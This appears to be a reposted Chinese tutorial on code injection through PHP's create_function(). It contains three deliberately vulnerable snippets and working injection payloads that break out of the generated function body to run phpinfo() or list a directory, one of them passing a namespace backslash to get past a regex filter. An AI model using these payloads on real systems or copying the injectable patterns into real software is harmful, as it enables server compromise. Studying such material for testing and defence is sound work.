0x00 create_function()介紹

create_function()創建匿名函數

string create_function ( string $args , string $code )

string

code 方法代碼部分

舉例：

create_function('$name','echo $name."A"')

類似于：

function name($name) {

echo $name."A";

}

0x01 漏洞利用

1

//02-8.php?id=2;}phpinfo();/*

$id=$_GET['id'];

$str2='echo '.$a.'test'.$id.";";

echo $str2;

echo "
";

echo "==============================";

echo "
";

$f1 = create_function('$a',$str2);

echo "
";

echo "==============================";

?>

payload:

http://localhost/libtest/02-8.php?id=2;}phpinfo();/*

原理：

id=2;}phpinfo();/*

執行函數為：

源代碼：

function fT($a) {

echo "test".$a;

}

注入后代碼：

function fT($a) {

echo "test";}

phpinfo();/*;//此處為注入代碼。

}

2

//how to exp this code

$sort_by=$_GET['sort_by'];

$sorter='strnatcasecmp';

$databases=array('test','test');

$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';

usort($databases, create_function('$a, $b', $sort_function));

?>

payload:

func.php?sort_by="]);}phpinfo();/*

3

error_reporting(0);

if(isset($_GET['action'])){

$action=$_GET['action'];

}

if(isset($_GET['action'])){

$arg=$_GET['arg'];

}

if(preg_match('/^[a-z0-9_]*$/isD',$action)){

show_sourse(_FILE_);

}else{

$action($arg,'');

}

?>

正則繞過，數字字母下劃線都被禁止.

思路就是在開頭或結尾插入字符繞過檢測，涉及到php全局命名空間：在函數的頭部加上 \就是調用全局的此函數，即\create_function()就是調用全局的create_function()函數，同時函數頭部加上\可繞過正則過濾，\即%5c.

漏洞利用處

arg,'');，也就是說如果利用create_function()函數漏洞，這里是參數為GET值，執行代碼為空

payload:

ip/?action=%5ccreate_function&arg=){}var_dump(scandir("./"));/*

總結

以上是生活随笔為你收集整理的php 命名空间 create_function,PHP create_function()注入命令执行漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。